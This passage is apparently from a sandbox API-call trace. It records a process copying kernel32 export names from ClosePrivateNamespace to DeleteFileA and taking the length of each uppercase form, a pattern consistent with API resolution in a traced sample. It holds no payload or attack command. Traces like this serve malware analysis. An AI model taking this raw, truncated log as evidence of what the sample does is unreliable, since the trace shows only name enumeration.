lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.275] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.275] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.275] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.275] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.275] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.275] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.276] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.276] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.276] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.276] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.276] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.276] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.276] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.276] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.276] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.276] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.276] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.276] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.276] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.277] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.277] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.277] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.277] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.277] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.277] lstrlenA (lpString="COPYFILEA") returned 9 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.277] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.277] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.277] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.277] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.277] lstrlenA (lpString="COPYFILEW") returned 9 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.277] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.277] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.277] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.277] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.277] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.277] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.277] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.277] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.278] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.278] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.278] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.278] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.278] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.278] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.278] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.278] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.278] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.278] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.278] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.278] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.278] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.278] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.278] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.278] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.278] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.278] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.279] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.279] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.279] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.279] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.279] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.279] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.279] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.279] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.279] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.279] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.279] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.279] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.279] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.279] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.279] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.279] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.279] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.279] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.279] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.280] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.280] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.280] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.280] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.280] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.280] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.280] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.280] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.280] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.280] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.280] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.280] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.280] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.280] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.280] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.280] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.280] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.280] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.280] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.281] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.281] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.281] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.281] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.281] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.281] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.281] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.281] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.281] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.281] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.281] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.281] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.281] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.281] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.281] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.281] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.281] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.282] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.282] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.282] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.282] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.282] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.282] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.282] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.282] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.282] lstrlenA (lpString="DELETEATOM") returned 10 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.282] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.282] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.282] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: 